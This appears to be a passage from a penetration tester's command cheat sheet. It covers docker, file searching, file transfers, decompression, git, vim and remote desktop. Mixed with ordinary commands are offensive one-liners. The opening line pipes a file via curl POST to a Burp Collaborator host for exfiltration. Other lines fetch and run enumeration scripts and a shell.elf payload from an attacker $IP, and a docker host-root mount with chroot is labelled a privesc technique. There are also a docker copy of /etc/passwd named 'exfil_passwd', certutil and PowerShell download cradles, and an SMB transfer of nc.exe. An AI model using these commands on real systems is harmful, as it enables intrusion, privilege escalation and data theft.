$ cat file.txt | curl -X POST -d @- http://burp.collaborator

wget

# download files with wget
$ wget http://$IP/xxx.sh

# run files without downloading
$ wget -O - http://$IP:<port>:lin(peas\|enum).sh

# download file and save it somewhere (tmp)
$ wget -O /tmp/shell.elf $IP/shell.elf

docker

# https://blog.ropnop.com/docker-for-pentesters/

$ docker version
$ docker info
$ docker pull registry:5000/alpine
$ docker inspect <container-id>
$ docker network ls
$ docker image ls
$ docker image history <image-name>
$ docker port <container-id>
$ docker rmi <image-name>
$ docker system prune -a
$ docker ps -a
$ docker start <container-id>
$ docker stop <container-id>
$ docker rm <container-id>

$ docker exec -it <container-id> /bin/sh # Get shell inside a container
$ docker run -it -v /:/host/ <image-name> chroot /host/ bash # Privesc technique
$ docker cp <container-id>:/etc/passwd exfil_passwd
$ docker exec <container-id> <command>

Finding and Locating Files

# find with file names
$ find . -name user.txt 

# find and execute
$ find . -name '*.txt' -exec cat "{}" \;

# find files with specific string in it
$ find . -type f -print0 | xargs -0 -e grep -niH -e "string"

# find certain file and exclude files from /proc/ and /sys/ directories
$ find / -name Settings.* 2>/dev/null | grep -v '/proc/' | grep -v '/sys/'

# List various available nmap scripts
$ locate scripts/citrix

File Transfers

SMB Server

# start server
$ impacket-smbserver share . -smb2support -user user -password password

# use server
C:\> net use \\$IP\share /USER:user password
smb> copy \\$IP\share\nc.exe .

HTTP

$ python3 -m http.server 80
$ service apache2 start
$ ngrok http 80

C:\> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://$IP/file.exe','C:\Users\user\Desktop\file.exe')"
C:\> iwr -uri http://$IP/file -Outfile file
C:\> wget http://$IP/file -O file
C:\> curl http://$IP/file -o file
C:\> certutil -urlcache -split -f http://$IP:8000/ok.exe ok.exe  

# ways to download file
$ wget http://$IP/file
$ curl http://$IP/file > file

scp

$ scp file user@$IP:/tmp/

nc

# receiver
$ nc -l -p 1234 > out.file 
# sender
$ nc -w 3 <dest_ip> 1234 < out.file

Decompressing Files

# unzip a zip file
$ unzip file.zip

# extract a .tar file
$ tar -xvf file.tar

# extract a .tar file from output
$ dd if=backup.ab bs=1 skip=24  | python -c 'import sys,zlib;sys.stdout.buffer.write(zlib.decompress(sys.stdin.buffer.read()))' | tar -xvf -

# unzip a *.tar.gz file
$ tar -xzvf file.tar.gz

watch

# monitor, repeat the same command for a period of time
# ls -la every 1 sec on a dir
$ watch -n 1 'ls -la'

# repeat executing the command
$ watch <command>
 
# execute the commands in specific intervals
$ watch -n <seconds> <command>

# highlight the differences in each execution ## Thanks copycookie.com 
$ watch -n <seconds> -d <command> 

# exit on changes
$ watch -g <command>

loops

# for loop that adds payload += in each line of the file
$ for i in $(cat hexdata); do echo "payload += b'$i'"; done

git

# https://github.com/arthaud/git-dumper

$ git log
$ git show <commit-id>

vim

x # cut character
dw # cut word
dd # cut full line
yw # copy word
yy # copy full line
p # paste
:1 # go to line number 1
:q! # quit without saving

Remote Desktop

# Connect to a Windows target using the Remote Desktop Protocol.
$ xfreerdp /v:IP /u:username /p:password /clipboard /dynamic-resolution

$ xfreerdp /d:'<domain_name>' /u:'<username>' /p:'<password>' /v:<host|ip> /size:95% /cert:ignore +clipboard +drive:<adhoc_sharing_folder_name>,</path/to/share/>